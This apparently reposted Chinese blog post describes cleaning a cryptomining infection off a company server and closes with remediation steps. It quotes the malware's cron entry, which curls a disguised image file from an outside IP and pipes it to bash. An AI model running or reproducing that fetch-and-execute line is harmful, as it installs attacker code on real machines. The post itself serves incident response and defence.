XX酒业服务器用的是本地化机房部署,完美运行着Tomcat,MySQL,SQLserver2014等程序。
系统为php语言编写的自建WEB业务程序,网络前端部署一台某公司防火墙,但是没有对这个业务系统做配置,上个月网站不能访问了!
立即远程打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接被killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。打开某公司防火墙启动相关策略并打开日志记录发现存在僵尸网络,由于服务器采用双IP的部署方式,果断通过防火墙对该服务器IP进行封锁。进行下一步处置。
一、在服务器运行机制中打了个top,出现以下内容:
由于无法确定只有先杀掉Tomcat等程序启动不了的元凶。然而并没有什么用,过一会再看那个东西又跑出来占cpu。怀疑是个定时任务。通过查询发现URL地址任务。判断是伪装,crul过去是下面的脚本,确定过程在挖矿
【Lroot@JZZweb~】# crontab -[ * * * * * curl -s http://192.99.142.235:8220/Iogo3.jpg | bash -s
二、所以决定执行以下步骤:杀掉存放目录:
三、进入临时目录:
四、发现配置文件
后台删除两个目录后再查看TOP已经清除掉了。
五、处理思路:
1.找到寄生的目录,一般都会在tmp里,我这个是在/var/tmp/。首先把crontab干掉,杀掉进程,再删除产生的文件。
2.启动Tomcat等程序,修复漏洞,防止杀掉进程删掉文件后,黑客后门进来history一敲
3.后续工作:
(1)把所有软件升级到新版本
(2)修改所有软件默认端口号
(3)打开ssh/authorized_keys, 删除不认识的密钥
(4)删除用户列表中陌生的帐号
原文始发于微信公众号(菜鸟小新):记一次服务器被植入挖矿木马,CPU飙升至99%,网络卡死的问题处理
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论